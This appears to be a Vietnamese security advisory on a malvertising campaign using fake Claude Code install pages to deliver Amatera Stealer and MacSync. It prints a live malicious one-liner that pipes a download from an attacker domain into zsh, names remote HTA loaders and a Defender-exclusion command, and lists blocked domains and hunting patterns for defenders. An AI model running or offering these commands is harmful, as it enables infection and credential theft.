TL;DR

Một chiến dịch malvertising đang chủ động nhắm vào developer và người dùng AI trên Google Search: kẻ tấn công mua sponsored ad với từ khóa "Claude Code", "install Claude Code", "Claude Code CLI", dẫn nạn nhân tới trang docs giả clone pixel-perfect host trên Squarespace, Cloudflare Pages, GitLab Pages, Tencent EdgeOne, hoặc PlayCode (claudcode[.]playcode[.]io). Chỉ khác mỗi dòng lệnh install: paste vào terminal là máy bị nhiễm. Trên Windows là Amatera Stealer, trên macOS là MacSync (infostealer + backdoor). Riêng variant đầu tiên trên claude.ai artifact đã có hơn 15.600 nạn nhân trước khi bị gỡ. Domain gỡ xong, ad vẫn chạy — kẻ tấn công chỉ cần cắm URL mới.

Chuyện gì đang xảy ra

Nhóm 7AI gọi đây là "Claude Fraud"; Push Security gọi kỹ thuật này là "InstallFix" — biến thể của ClickFix nhưng không cần lý do giả (fake CAPTCHA, fake error). Lý do ở đây đơn giản hơn nhiều: bạn muốn cài Claude Code, và từ Homebrew, Rust, nvm, Bun, oh-my-zsh tới Claude Code, thói quen curl https://… | bash đã trở thành chuẩn công nghiệp. Toàn bộ model bảo mật gói gọn trong "tin domain". Kẻ tấn công chỉ việc clone trang install và tráo URL trong one-liner — không mấy ai đọc URL trước khi paste.

Chuỗi phân phối là malvertising thuần túy: ad chạy từ tài khoản Google Ads bị chiếm dụng của doanh nghiệp thật (một công ty Malaysia, một tổ chức từ thiện trẻ em Canada, một nhà bán lẻ Colombia) nên vượt được verification của Google. Nạn nhân tự search, tự click — bypass toàn bộ phishing filter email.

Chuỗi tấn công: từ click tới Amatera Stealer

Trên Windows, lệnh PowerShell/cmd giả gọi mshta.exe (LOLBIN hợp pháp của Microsoft) nạp HTA từ xa — thường là claude[.]update-version[.]com/claude hoặc claude-code.official-version[.]com/claude. Attacker cố tình dùng phiên bản 32-bit (SysWOW64\mshta.exe) trên máy 64-bit để né EDR chỉ giám sát không gian 64-bit. HTA chạy trong bộ nhớ, giải mã đệ quy một payload MSIL, rồi nhảy sang shellcode cuối nạp Amatera Stealer (bản kế thừa của ACR Stealer, bán theo subscription trên dark market). Amatera dùng dynamic API resolution với WoW64 syscalls, direct NTSockets cho C2, và hardcode IP của CDN hợp pháp → khó block ở tầng mạng mà không phá luôn dịch vụ thật.

Trên macOS, lệnh Terminal giải base64 thành shell script, tải MacSync (hoặc binary kiểu AMOS). Variant mới nhất (ghi nhận 9/4/2026) chạy: curl isgilan.com/curl/base64 -D | gunzip | zsh → tải /tmp/helperxattr -c để bypass Gatekeeper → spawn bash shell → chạy AppleScript obfuscate theo kiểu số học (build string bằng cách trừ mảng integer tại runtime) kiểm tra sandbox (VMware, VirtualBox, Parallels, QEMU) → và tàn nhẫn nhất: pkill Terminal để hủy session, xóa dấu vết. Mỗi nạn nhân được redirect qua một Cloudflare Workers subdomain duy nhất (kiểu bland-cache-0953.kieutrinh509372.workers.dev) để kẻ tấn công theo dõi tỷ lệ chuyển đổi ad → nạn nhân. Username GitLab dùng danh tính đánh cắp của một nữ diễn viên Việt Nam.

Chúng ăn cắp những gì

  • macOS Keychain: mật khẩu, certificate, secure notes
  • Browser: login saved, session cookie, autofill
  • Ví crypto: private key
  • Token: session token, auth token, SSH key, cloud credential
  • Backdoor (macOS): reverse shell qua /bin/bash hoặc /bin/zsh để attacker remote control
  • Persistence (Windows, vector VS Code extension): Add-MpPreference -ExclusionPath "C:\temp" ghi vĩnh viễn vào registry HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths — mọi payload thả vào C:\temp về sau vô hình với Defender cho tới khi bạn tự dọn.

Dữ liệu được đóng ZIP (ví dụ /tmp/osalogging.zip), upload lên C2 với retry exponential backoff tới 8 lần, rồi xóa sạch staging files.

Vì sao chiến dịch này đặc biệt nguy hiểm

Đây không phải phishing thô. Nó phá sập ba trụ của security awareness truyền thống:

  1. Domain signal vô hiệu. Variant đầu tiên host trên chính claude.ai (lợi dụng public artifact). Các variant sau dùng Squarespace, Cloudflare Pages, GitLab Pages — đều có HTTPS hợp lệ từ ngày đầu. URL check và HTTPS không còn là tín hiệu đủ.
  2. Tiếng ồn dev-tool che giấu hành vi xấu. AI coding tool như Claude Code, Cursor, Codex thường xuyên spawn shell, exec script, gọi dịch vụ ngoài ở tốc độ máy. Command độc trộn thẳng vào noise này, làm mất dấu các tín hiệu bất thường về thời điểm / process lineage mà defender từng dựa vào.
  3. Target profile cao giá. Dev và security researcher có privilege cao, credential giá trị lớn (SSH, cloud token, crypto). Một máy dev bị nhiễm có thể kéo sập cả môi trường production.

Làm sao để an toàn

Cho cá nhân:

  • URL chính chủ duy nhất: claude.ai/code (download) và docs.claude.com/docs/en/overview (docs). Không có source chính thức nào khác.
  • Bỏ qua sponsored result khi search tool dev. Scroll xuống organic result.
  • Đọc URL bên trong one-liner trước khi paste. Nếu dòng curl trỏ tới domain lạ — dừng.
  • VS Code extension: check publisher name, install count, GitHub repo link, ngày cập nhật. Extension "Anthropic" với 200 install đăng tuần trước = red flag.
  • Nếu hướng dẫn bảo "đừng lo lệnh này làm gì" — đóng tab.

Cho team bảo mật (SOC):

  • DNS/firewall block: *.official-version[.]com, *.update-version[.]com, a2abotnet[.]com, isgilan.com, claude-code-app.gitlab.io
  • Hunt Windows: process chain Code.exe → powershell.exe → mshta.exe với remote URL; cảnh báo mọi Add-MpPreference -ExclusionPath có parent là Code.exe.
  • Hunt macOS: osascript sau curl | base64 -d | gunzip | zsh; xattr -c rồi exec từ /tmp; pkill Terminal từ non-interactive parent.
  • Audit HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths cho entry C:\temp.
  • Monitor DNS cho domain có ngày đăng ký trùng ngày kết nối. Cảnh báo traffic tới *.workers.dev đi kèm curl.
  • Ưu tiên MDM-deploy dev tooling; policy ad-block trên browser cho developer workstation.

Bức tranh lớn: InstallFix sẽ không dừng ở Claude

Push Security khẳng định: 4/5 ClickFix lure họ chặn được đều đến từ search engine. Cùng kỹ thuật đã được dùng để clone trang Homebrew (phát tán Cuckoo stealer), trang OpenClaw giả trên GitHub (GhostSocks proxy), package npm giả tên Claude Code, và mới nhất là trang NotebookLM giả (notebooklm-version-upd[.]squarespace[.]com). Bất kỳ tool nào dễ clone + có lượng click lớn đều là mục tiêu tiềm năng. Chừng nào thói quen "curl | bash" còn là chuẩn industry, chừng đó InstallFix còn sống — và còn tiến hóa (per-victim tracking, same-day domain, AppleScript arithmetic obfuscation đã là chuẩn mới).

Domain biến mất, ads vẫn chạy. Defender quen dùng IOC block giờ phải chuyển sang hunt behavior (process lineage, DNS correlation). User bình thường thì cần một quy tắc duy nhất: URL trong lệnh install phải khớp domain chính chủ. Không khớp = không paste.

Nguồn: Push Security, Bitdefender Labs, 7AI Threat Research, 7AI (live takedown 9/4/2026), Help Net Security, @malware_owl.